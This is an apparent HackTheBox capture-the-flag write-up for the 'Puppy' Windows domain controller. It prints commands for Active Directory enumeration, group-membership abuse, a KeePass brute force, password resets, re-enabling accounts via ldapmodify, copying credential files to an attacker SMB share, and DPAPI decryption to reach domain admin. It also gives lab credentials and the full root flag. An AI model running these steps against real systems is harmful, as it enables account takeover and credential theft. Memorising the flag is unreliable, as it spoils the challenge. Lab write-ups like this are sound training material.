Setup
mkdir -p ~/ctf/HackTheBox/puppy/scans; cd ~/ctf/HackTheBox/puppy
IP Address: 10.10.11.70
echo "10.10.11.70 puppy.htb" | sudo tee -a /etc/hosts
10.10.11.70 puppy.htb
Enumeration
nmap -sC -sV -Pn -p- puppy.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 puppy.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-05-21 22:23:04Z)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
2049/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
3260/tcp open iscsi? syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open msrpc syn-ack Microsoft Windows RPC
61145/tcp open msrpc syn-ack Microsoft Windows RPC
61181/tcp open unknown syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62785/tcp): CLEAN (Timeout)
| Check 2 (port 47994/tcp): CLEAN (Timeout)
| Check 3 (port 26380/udp): CLEAN (Failed to receive data)
| Check 4 (port 46192/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-21T22:24:58
|_ start_date: N/A
|_clock-skew: 6h39m05s
CrackMapExec shows domain name as puppy.htb, we are provided with user levi.james:KingofAkron2025! making it assumed breach scenario.
![[Pasted_image_20250521222326.png]](/images/post/Pasted_image_20250521222326.png)
found one DEV share, we also have ldap access so using
bloodhound-python -d puppy.htb -u "levi.james" -p 'KingofAkron2025!' -ns 10.10.11.70 -c all --zip
we get bloodhound data and in blood hound we see levi.james is a part of HR group which has Generic write access on Developers group.
Using:
net rpc group addmem "DEVELOPERS" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"
net rpc group members "DEVELOPERS" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"
![[Pasted_image_20250521222628.png]](/images/post/Pasted_image_20250521222628.png)
![[Pasted_image_20250521222956.png]](/images/post/Pasted_image_20250521222956.png)
we can now access DEV:
![[Pasted_image_20250521212252.png]](/images/post/Pasted_image_20250521212252.png)
In DEV share we see Keepass DB file:
![[Pasted_image_20250521225600.png]](/images/post/Pasted_image_20250521225600.png)
using keepass4brute :
![[Pasted_image_20250521225656.png]](/images/post/Pasted_image_20250521225656.png)
Using https://app.keeweb.info/ we open the KDBX and get :
![[Pasted_image_20250521230247.png]](/images/post/Pasted_image_20250521230247.png)
ant.edwards:A*******
![[Pasted_image_20250521233850.png]](/images/post/Pasted_image_20250521233850.png)
using:
net rpc password "adam.silver" "Password@123" -U "puppy.htb"/'ant.edwards'%'A*******' -S 10.10.11.70
we change the password and while checking using CrackMapExec we see the user is disabled:
![[Pasted_image_20250522212948.png]](/images/post/Pasted_image_20250522212948.png)
using ldapmodify we modify the userAccountControl value from 514(disabled) to 512(Normal User Account):
ldapmodify -x -H ldap://10.10.11.70 -D "CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB" -w 'Antman2025!'
dn: CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512
![[Pasted_image_20250522213243.png]](/images/post/Pasted_image_20250522213243.png)
Now checking using Crackmapexec we get:
![[Pasted_image_20250522213309.png]](/images/post/Pasted_image_20250522213309.png)
we get winrm access and flag on Desktop
User Flag
Location: C:\Users\adam.silver\Desktop\user.txt | Flag: b****************************
Privilege Escalation
in the C:\Backups directory we see a zip, downloading and unziping that file.
![[Pasted_image_20250524005346.png]](/images/post/Pasted_image_20250524005346.png)
![[Pasted_image_20250524005404.png]](/images/post/Pasted_image_20250524005404.png)
in the nms-auth-config.xml.bak file we get the password for steph.cooper:
![[Pasted_image_20250524005530.png]](/images/post/Pasted_image_20250524005530.png)
steph.cooper:Ch*********
when enumerating using bloodhound and also checking with CrackMapExec, we see steph.cooper can login using winrm
in the C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials we find the Windows Credential Manager,
![[Pasted_image_20250601002738.png]](/images/post/Pasted_image_20250601002738.png)
using smbserver we transfer the credential and key file to linux machine:
smbserver.py share $(pwd) -smb2support
![[Pasted_image_20250601003811.png]](/images/post/Pasted_image_20250601003811.png)
![[Pasted_image_20250601003844.png]](/images/post/Pasted_image_20250601003844.png)
using impacket-dpapi impacket-dpapi masterkey -sid 'S-1-5-21-1487982659-1829050783-2281216199-1107' -password 'Ch*********' -file key_file
we get a decrypted key
![[Pasted_image_20250601003928.png]](/images/post/Pasted_image_20250601003928.png)
using the above decrypted key and credential vault file we get password for steph.cooper_adm
![[Pasted_image_20250601004129.png]](/images/post/Pasted_image_20250601004129.png)
steph.cooper_adm:Fi*******************
When checking with CrackMapExec we see this user is a Admin
![[Pasted_image_20250601004410.png]](/images/post/Pasted_image_20250601004410.png)
Root Flag
Location: C:\Users\Administrator\Desktop\root.txt | Flag: 9ad365f27f5d08522e359909f7c26169